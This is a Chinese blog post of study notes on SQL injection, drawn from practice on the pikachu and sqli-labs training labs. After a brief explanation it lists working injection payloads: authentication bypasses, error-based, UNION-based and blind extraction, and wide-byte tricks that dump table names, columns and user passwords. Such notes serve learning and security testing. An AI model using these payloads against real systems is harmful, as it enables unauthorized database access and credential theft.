8.30日网络安全知识整理（sql）_数据库length(database())返回内容-优快云博客

本文链接：https://blog.youkuaiyun.com/kaka6764/article/details/141799580

1.sql注入原理

主要是开发人员在构建代码时，没有对输入边界进行安全考虑，导致攻击者可以通过合法的输入点提交一些精心构造的语句，从而欺骗后台数据库对其进行执行，导致数据库信息泄漏的一种漏洞。

2.sql注入常用函数

来自于sql练习中使用过的函数

pikachu漏洞练习第四章节SQL注入-数字型注入（post）练习收获_post注入-优快云博客

pikachu漏洞练习第四章节SQL注入-字符型注入（get）练习收获_pikachu sql注入第四关-优快云博客

pikachu漏洞练习第四章节SQL注入-insert/update，delete注入练习收获-优快云博客

pikachu漏洞练习第四章节SQL注入-搜索型，xx型注入练习收获-优快云博客

pikachu漏洞练习第四章节SQL注入-http header注入练习收获-优快云博客

pikachu漏洞练习第四章节SQL注入-基于boolian的盲注，原理练习收获-优快云博客

pikachu漏洞练习第四章sql注入-宽字节注入练习收获-优快云博客

pikachu漏洞练习第四章节SQL注入-盲注based on time，原理练习收获-优快云博客

sqli-labs漏洞练习1-6关练习收获,sqli手工注入与sqlmap使用-优快云博客

select 字段1，字段2 from 表名 where username = 'name' or 1=1#';
select 字段1，字段2 from 表名 where username = 'name' or 1=1#';
select * from member where username like '%a%';
sql%' or 1=1 #
sql') or 1=1 #
' or updatexml(1,concat(0x7e,database()),0) or '
?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
?id=1") order by 3--+
?id=-1") union select 1,2,3--+
?id=-1") union select 1,database(),version()--+
?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
?id=-1") union select 1,2,group_concat(username ,id , password) from users--+
allen' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<113#
name=allen%df' union select (select group_concat(table_name) from information_schema.tables where table_schema=database()),2#
name=allen%df' union select (select group_concat(column_name) from information_schema.columns where table_schema=(select database()) and table_name=(select table_name from information_schema.tables where table_schema=(select database())limit 3,1)),2#